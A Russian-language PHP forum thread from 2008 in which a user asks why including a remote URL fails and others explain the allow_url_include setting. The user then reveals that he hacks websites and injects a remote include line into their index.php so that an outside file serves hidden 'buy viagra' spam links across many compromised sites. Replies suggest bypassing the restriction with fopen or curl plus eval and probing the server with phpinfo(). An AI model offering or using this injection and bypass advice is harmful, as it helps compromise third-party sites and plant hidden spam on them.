1. Задавайте здесь вопросы о коде, которые не подходят в другие разделы, такие как:
    Дизайн > Верстка
    PHP > Как сделать на PHP
    Скрыть объявление

Проблема с includ

Тема в разделе "Web Coding", создана пользователем gorilla, 29 янв 2008.

Статус темы:
Закрыта.
Модераторы: latteo
  1. gorilla

    gorilla

    Регистр.:
    11 сен 2007
    Сообщения:
    211
    Симпатии:
    27
    Почему когда делаю инклуд с удалённого сервера типа include ("http://XXXX.XXX/XXX.php"); вылазит ошибка а когда делаю локально include ("/XXX.php"); то всё ок? не пому и пробовал по разному include "xxxxx"; include 'xxxxx'; не чего не выходит?
     
  2. vilk108

    vilk108

    Регистр.:
    17 дек 2007
    Сообщения:
    174
    Симпатии:
    41
    какое сообщение выводит php когда происходит ошибка?
     
  3. gorilla

    gorilla

    Регистр.:
    11 сен 2007
    Сообщения:
    211
    Симпатии:
    27
    Warning: main() [function.main]: URL file-access is disabled in the server configuration in /mnt/gs01/herd03/5040/domains/XXXXXXX.com/html/index.php on line 2

    Warning: main(http://XXXXXXXXX/w.php) [function.main]: failed to open stream: no suitable wrapper could be found in /mnt/gs01/herd03/5040/domains/XXXXXXX.com/html/index.php on line 2

    Warning: main() [function.include]: Failed opening 'http://xxxxxxxxxxx.com/w.php' for inclusion (include_path='.:/usr/local/php-4.4.8-1/share/pear') in /mnt/gs01/herd03/5040/domains/xxxxxxxxx.com/html/index.php on line 2
     
  4. vilk108

    vilk108

    Регистр.:
    17 дек 2007
    Сообщения:
    174
    Симпатии:
    41
    Наверно хостинг провайдер отключил возможность подключение скриптов, или страниц с удаленных серверов
     
  5. General Fizz

    General Fizz Боевой Генерал :)

    Регистр.:
    11 апр 2007
    Сообщения:
    753
    Симпатии:
    396
    Инклюдить удаленный файл - верх идиотизма. Могут подсунуть все, что угодно, вплоть до шелла. Лучше делать так:
    PHP:
    $fp=fopen('http://XXXX.XXX/XXX.php','r');
    или загружать курлом
     
  6. Dogmat

    Dogmat Постоялец

    Регистр.:
    16 фев 2007
    Сообщения:
    121
    Симпатии:
    38
    неоправданно - да идиотизм.
    но может случай быть - когда эта возможность необходима.




    2 gorilla
    1. в теме надо сразу указывать какую ошибку выдает.
    2. английский знаешь? нет - тогда переводчиком пользуйся. вопросов глупых будет меньше.
    3. можно попробывать обойти ограничение - получить содержимое файла через один из методов(fopen,curl) и прогнать через eval, но судя по твоим ограничениям eval - тоже скоре всего запрещена. но попытка не пытка. пробуй.
     
  7. VaaL2004

    VaaL2004 Прохожие

    Проверь в настройках (php.ini) параметр safe_mode и ему подобные. Должен быть выключен.
     
  8. PHP_Master

    PHP_Master

    Регистр.:
    3 фев 2008
    Сообщения:
    2.647
    Симпатии:
    590
    safe_mode к данной ошибке отношения не имеет.

    дело в allow_url_include
     
  9. gorilla

    gorilla

    Регистр.:
    11 сен 2007
    Сообщения:
    211
    Симпатии:
    27
    ну мне вообщето надо инкудить ссылки.
    Ломаеш сайт.
    вставляеш в инедекс пхп <?php include 'http://ххххх.com/w.php'; ?> а сам фаил w.php содержит
    <html><body><div style="display:none"><a href=" "http://xxxxxxxxx.com/">buy viagra</a></div></body></html>

    Получается у тебя 1000 морд еси на каждую ссылы проставлять заманаешся а тут в одном файле поменл и иди кури бабло дери.

    Есть недостаток хостер уйдёт в даун на мордах повылазят ошибки и сетке ппс)))
     
  10. Dogmat

    Dogmat Постоялец

    Регистр.:
    16 фев 2007
    Сообщения:
    121
    Симпатии:
    38
    Ну а чего ты мозг канифолишь? сказал бы сразу, что чисто текст получаешь. зачем тебе тогда вобще include??

    вариантов много чтобы файло получить просто.

    вставляй
    PHP:
    <!--
    <?php phpinfo(); ?>
    -->
    смотри что доступно, какие методы. ну и все собсно, дело в шляпе. можешь и сюда пульнуть подскажем.
     
Статус темы:
Закрыта.